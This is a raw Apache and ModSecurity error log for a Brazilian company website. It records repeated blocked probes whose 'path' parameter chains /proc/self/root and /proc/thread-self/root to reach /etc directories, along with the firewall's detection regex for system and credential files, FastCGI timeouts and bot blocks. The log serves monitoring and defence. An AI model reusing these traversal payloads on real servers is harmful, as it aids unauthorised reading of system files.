[Tue Mar 17 17:00:11.561122 2026] [:error] [pid 7004:tid 140411641214720] [client 74.7.243.128:42050] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmyy8U6Sx0TG1YjmQjAqQAAAow"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 17:00:15.668212 2026] [:error] [pid 7004:tid 140411725141760] [client 74.7.241.31:60490] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmyz8U6Sx0TG1YjmQjAqgAAAoI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 17:00:17.354136 2026] [proxy_fcgi:error] [pid 29151:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:50462] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:00:24.240277 2026] [:error] [pid 7004:tid 140411674785536] [client 74.7.241.31:40102] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmy2MU6Sx0TG1YjmQjArQAAAog"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 17:00:27.670661 2026] [mime_magic:error] [pid 2598:tid 140411574073088] (70014)End of file found: [client 74.7.243.128:42054] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/lib/firmware/meson
[Tue Mar 17 17:00:27.670902 2026] [access_compat:error] [pid 2598:tid 140411574073088] [client 74.7.243.128:42054] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php5, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/lib/firmware/meson
[Tue Mar 17 17:00:32.990804 2026] [core:alert] [pid 25836:tid 140411540502272] [client 74.7.241.31:53924] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 17:00:40.125801 2026] [proxy_fcgi:error] [pid 18380:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:51304] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:01:03.091955 2026] [proxy_fcgi:error] [pid 19507:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:51956] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:01:06.423268 2026] [:error] [pid 2598:tid 140411699963648] [client 74.7.241.31:47966] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmzARj0p0SRWAqcjGGLggAAAwU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 17:01:24.093838 2026] [proxy_fcgi:error] [pid 2473:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:52510] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:01:27.664060 2026] [:error] [pid 29151:tid 140411658000128] [client 74.7.241.31:54874] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmzF_PqhzTj3BvfDX-Z2wAAAco"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 17:01:47.125810 2026] [proxy_fcgi:error] [pid 26799:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:53164] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:02:05.219560 2026] [:error] [pid 2598:tid 140411733534464] [client 74.7.243.128:42054] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmzPRj0p0SRWAqcjGGLvAAAAwE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 17:02:10.085473 2026] [proxy_fcgi:error] [pid 25836:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:53800] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:02:12.471711 2026] [:error] [pid 7437:tid 140411691570944] [client 74.7.241.31:49188] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmzRAeiSKl8TjouI-YqEAAAA8Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 17:02:22.092904 2026] [:error] [pid 7437:tid 140411683178240] [client 74.7.243.128:49010] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmzTgeiSKl8TjouI-YqFQAAA8c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 17:02:32.117773 2026] [proxy_fcgi:error] [pid 7004:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:54442] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:02:33.575112 2026] [:error] [pid 6296:tid 140411658000128] [client 74.7.241.31:54196] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmzWXIk7brgkOH-rIWetQAAAUo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 17:02:34.559830 2026] [mime_magic:error] [pid 18380:tid 140411683178240] (70014)End of file found: [client 216.73.216.191:25030] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Tue Mar 17 17:02:47.641995 2026] [core:alert] [pid 7437:tid 140411565680384] [client 74.7.243.128:49010] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/usr/lib/kbd/consolefonts
[Tue Mar 17 17:02:54.129797 2026] [proxy_fcgi:error] [pid 2473:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:55134] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:03:16.127551 2026] [proxy_fcgi:error] [pid 26799:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:55526] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:03:29.332202 2026] [:error] [pid 2598:tid 140411574073088] [client 74.7.243.128:51350] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmzkRj0p0SRWAqcjGGL-AAAAxQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 17:03:30.936670 2026] [:error] [pid 2598:tid 140411741927168] [client 74.7.243.128:51350] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmzkhj0p0SRWAqcjGGL-gAAAwA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 17:03:37.285772 2026] [proxy_fcgi:error] [pid 2473:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:56030] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:03:47.074239 2026] [:error] [pid 29151:tid 140411741927168] [client 74.7.243.128:54176] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmzo_PqhzTj3BvfDX-aJQAAAcA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 17:03:50.462476 2026] [:error] [pid 25836:tid 140411691570944] [client 74.7.241.31:34522] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmzpoh-PF_25v4hFRB9gQAAAQY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 17:04:02.147656 2026] [proxy_fcgi:error] [pid 19507:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:56918] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:04:05.403251 2026] [:error] [pid 6296:tid 140411658000128] [client 74.7.241.31:53422] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmztXIk7brgkOH-rIWfFAAAAUo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 17:04:13.250842 2026] [:error] [pid 7004:tid 140411624429312] [client 74.7.243.128:33342] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmzvcU6Sx0TG1YjmQjBJAAAAo4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 17:04:17.149108 2026] [:error] [pid 2473:tid 140411691570944] [client 74.7.244.43:43964] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abmzwaBJNF7axNlVR0UrJQAAAAY"]
[Tue Mar 17 17:04:19.823016 2026] [:error] [pid 19507:tid 140411674785536] [client 74.7.241.31:34392] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmzw9Y0UrI5A3LftIwP4QAAAYg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 17:04:25.333794 2026] [proxy_fcgi:error] [pid 26799:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:57540] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:04:48.099267 2026] [proxy_fcgi:error] [pid 2473:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:58354] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:04:48.827378 2026] [:error] [pid 7004:tid 140411691570944] [client 74.7.241.31:57828] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmz4MU6Sx0TG1YjmQjBMwAAAoY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 17:04:53.125818 2026] [:error] [pid 6296:tid 140411691570944] [client 74.7.228.61:46676] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abmz5XIk7brgkOH-rIWfMgAAAUY"]
[Tue Mar 17 17:05:15.153805 2026] [proxy_fcgi:error] [pid 25836:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:59200] AH01075: Error dispatching request to : (polling)
